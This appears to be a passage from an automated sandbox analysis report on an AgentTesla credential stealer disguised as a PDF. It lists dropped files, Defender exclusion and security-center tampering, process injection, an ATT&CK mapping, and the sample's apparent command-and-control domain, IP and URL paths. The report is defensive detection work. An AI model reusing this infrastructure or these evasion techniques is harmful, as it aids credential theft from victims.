Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 11_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      Changes security center settings (notifications, updates, antivirus, firewall)
                      Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: svchost.exe, 00000007.00000002.506679598.000002B19E23D000.00000004.00000001.sdmp | Binary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000007.00000002.509083393.000002B19E302000.00000004.00000001.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                      Stealing of Sensitive Information:

                      Yara detected AgentTesla
                      Source: Yara match | File source: 0000001B.00000002.497563880.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001B.00000002.519847077.0000000002C91000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000002.544302148.000000000477A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000002.544137822.0000000003D04000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.509634686.0000000003B23000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: RFQ - REF 208056-pdf.exe PID: 6556, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1020, type: MEMORY
                      Source: Yara match | File source: 0.2.RFQ - REF 208056-pdf.exe.3d586d0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.svchost.exe.47b10f0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.svchost.exe.47b10f0.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.RFQ - REF 208056-pdf.exe.3d586d0.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.RFQ - REF 208056-pdf.exe.3b23dd8.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.RFQ - REF 208056-pdf.exe.3b23dd8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.svchost.exe.477aed0.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.svchost.exe.477aed0.6.raw.unpack, type: UNPACKEDPE

                      Remote Access Functionality:

                      Yara detected AgentTesla
                      Source: Yara match | File source: 0000001B.00000002.497563880.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001B.00000002.519847077.0000000002C91000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000002.544302148.000000000477A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000002.544137822.0000000003D04000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.509634686.0000000003B23000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: RFQ - REF 208056-pdf.exe PID: 6556, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1020, type: MEMORY
                      Source: Yara match | File source: 0.2.RFQ - REF 208056-pdf.exe.3d586d0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.svchost.exe.47b10f0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.svchost.exe.47b10f0.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.RFQ - REF 208056-pdf.exe.3d586d0.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.RFQ - REF 208056-pdf.exe.3b23dd8.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.RFQ - REF 208056-pdf.exe.3b23dd8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.svchost.exe.477aed0.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.svchost.exe.477aed0.6.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation1 | DLL Side-Loading1 | Exploitation for Privilege Escalation1 | Disable or Modify Tools21 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Native API1 | Application Shimming1 | DLL Side-Loading1 | Deobfuscate/Decode Files or Information1 | LSASS Memory | System Information Discovery23 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Command and Scripting Interpreter1 | Windows Service1 | Application Shimming1 | Obfuscated Files or Information2 | Security Account Manager | Query Registry1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | Service Execution2 | Registry Run Keys / Startup Folder11 | Access Token Manipulation1 | Software Packing1 | NTDS | Security Software Discovery241 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol2 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Windows Service1 | Timestomp1 | LSA Secrets | Virtualization/Sandbox Evasion24 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Process Injection212 | DLL Side-Loading1 | Cached Domain Credentials | Process Discovery3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Registry Run Keys / Startup Folder11 | Masquerading221 | DCSync | Application Window Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion24 | Proc Filesystem | Remote System Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Access Token Manipulation1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection212 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

                      Behavior Graph

                      Behavior Graph ID: 358398
                      Sample: RFQ - REF 208056-pdf.exe
                      Start date: 25/02/2021
                      Architecture: WINDOWS
                      Score: 100

                      Legend: numbers shown after a process name are the graph's counts of created registry values and created files.

                      Start node:
                      • DNS/IP: coroloboxorozor.com
                      • Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Multi AV Scanner detection for submitted file; 8 other signatures
                      • Processes started: RFQ - REF 208056-pdf.exe (23 9); explorer.exe; svchost.exe; 5 other processes

                      RFQ - REF 208056-pdf.exe:
                      • DNS/IP: coroloboxorozor.com 172.67.172.17, ports 49708, 49730, 49736, CLOUDFLARENETUS United States
                      • Dropped: C:\Windows\Microsoft.NET\...\svchost.exe (PE32); C:\Windows\...\svchost.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\...\AdvancedRun.exe (PE32)
                      • Signatures: Creates an autostart registry key pointing to binary in C:\Windows; Adds a directory exclusion to Windows Defender; Hides threads from debuggers; Injects a PE file into a foreign processes
                      • Child processes started: AdvancedRun.exe (1); cmd.exe; powershell.exe (23); powershell.exe

                      explorer.exe:
                      • Signature: Drops executables to the windows directory (C:\Windows) and starts them
                      • Child process started: svchost.exe

                      svchost.exe (started from the start node):
                      • Signature: Changes security center settings (notifications, updates, antivirus, firewall)

                      5 other processes:
                      • DNS/IP: 127.0.0.1 unknown unknown

                      AdvancedRun.exe (child of RFQ - REF 208056-pdf.exe):
                      • Child process started: AdvancedRun.exe, which contacts 192.168.2.1 unknown unknown

                      cmd.exe:
                      • Child processes started: conhost.exe; timeout.exe

                      powershell.exe (both instances):
                      • Child process started: conhost.exe

                      svchost.exe (child of explorer.exe):
                      • DNS/IP: coroloboxorozor.com
                      • Signatures: System process connects to network (likely due to code injection or exploit); Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to delay execution (extensive OutputDebugStringW loop)

                      Screenshots


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      RFQ - REF 208056-pdf.exe | 18% | Virustotal |
                      RFQ - REF 208056-pdf.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx
                      RFQ - REF 208056-pdf.exe | 100% | Joe Sandbox ML |

                      Dropped Files

                      Source | Detection | Scanner | Label
                      C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe | 100% | Joe Sandbox ML |
                      C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe | 3% | Metadefender |
                      C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe | 0% | ReversingLabs |
                      C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      16.0.svchost.exe.d60000.0.unpack | 100% | Avira | TR/Dropper.Gen
                      16.2.svchost.exe.d60000.0.unpack | 100% | Avira | TR/Dropper.Gen
                      0.2.RFQ - REF 208056-pdf.exe.50000.0.unpack | 100% | Avira | TR/Dropper.Gen
                      0.0.RFQ - REF 208056-pdf.exe.50000.0.unpack | 100% | Avira | TR/Dropper.Gen

                      Domains

                      Source | Detection | Scanner | Label
                      coroloboxorozor.com | 15% | Virustotal |

                      URLs

                      Source | Detection | Scanner | Label
                      http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
                      http://coroloboxorozor.com | 15% | Virustotal |
                      http://coroloboxorozor.com | 0% | Avira URL Cloud | safe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe
                      http://coroloboxorozor.com/base/4FDB764474638ADF12639B4DA858CE81.html | 15% | Virustotal |
                      http://coroloboxorozor.com/base/4FDB764474638ADF12639B4DA858CE81.html | 0% | Avira URL Cloud | safe
                      http://crl.microsoft.co | 0% | Virustotal |
                      http://crl.microsoft.co | 0% | Avira URL Cloud | safe
                      https://sectigo.com/CPS0C | 0% | URL Reputation | safe
                      https://sectigo.com/CPS0D | 0% | URL Reputation | safe
                      http://coroloboxorozor.com/base/7DD0ECB3FED3970A09258155874027F0.html | 0% | Avira URL Cloud | safe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
                      http://www.microsoft.coaHp | 0% | Avira URL Cloud | safe
                      http://coroloboxorozor.com/base/67CF952D671D30AE6DA37F3E241170D6.html | 0% | Avira URL Cloud | safe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
                      https://activity.windows.comr | 0% | URL Reputation | safe
                      https://%s.xboxlive.com | 0% | URL Reputation | safe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
                      http://crl.m | 0% | URL Reputation | safe
                      https://dynamic.t | 0% | URL Reputation | safe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
                      https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      coroloboxorozor.com | 172.67.172.17 | true | true | | unknown

                      Contacted URLs

                      Name | Malicious | Antivirus Detection | Reputation
                      http://coroloboxorozor.com/base/4FDB764474638ADF12639B4DA858CE81.html | true | 15%, Virustotal; Avira URL Cloud: safe | unknown
                      http://coroloboxorozor.com/base/7DD0ECB3FED3970A09258155874027F0.html | true | Avira URL Cloud: safe | unknown
                      http://coroloboxorozor.com/base/67CF952D671D30AE6DA37F3E241170D6.html | true | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://ocsp.sectigo.com0 | RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000005.00000002.307284356.00000243FF03E000.00000004.00000001.sdmp | false | | high
                      https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmp | false | | high
                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 00000005.00000002.307284356.00000243FF03E000.00000004.00000001.sdmp | false | | high
                      https://t0.tiles.ditu.live.com/tiles/gen | svchost.exe, 00000005.00000003.307003492.00000243FF04D000.00000004.00000001.sdmp | false | | high
                      https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmp | false | | high
                      http://coroloboxorozor.com | RFQ - REF 208056-pdf.exe, 00000000.00000002.403215923.0000000002581000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.524567158.00000000034C1000.00000004.00000001.sdmp | true | 15%, Virustotal; Avira URL Cloud: safe | unknown
                      https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe, 00000005.00000003.307049363.00000243FF042000.00000004.00000001.sdmp | false | | high
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmp | false | | high
                      https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000005.00000003.307021748.00000243FF04A000.00000004.00000001.sdmp | false | | high
                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 00000005.00000002.307267041.00000243FF029000.00000004.00000001.sdmp | false | | high
                      https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 00000005.00000003.307049363.00000243FF042000.00000004.00000001.sdmp | false | | high
                      http://crl.microsoft.co | powershell.exe, 00000011.00000002.551437427.0000000009B51000.00000004.00000001.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
                      https://sectigo.com/CPS0C | RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      https://sectigo.com/CPS0D | RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      https://appexmapsappupdate.blob.core.windows.net | svchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmp | false | | high
                      http://www.nirsoft.net/ | AdvancedRun.exe, AdvancedRun.exe, 0000000D.00000000.329692687.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmp | false | | high
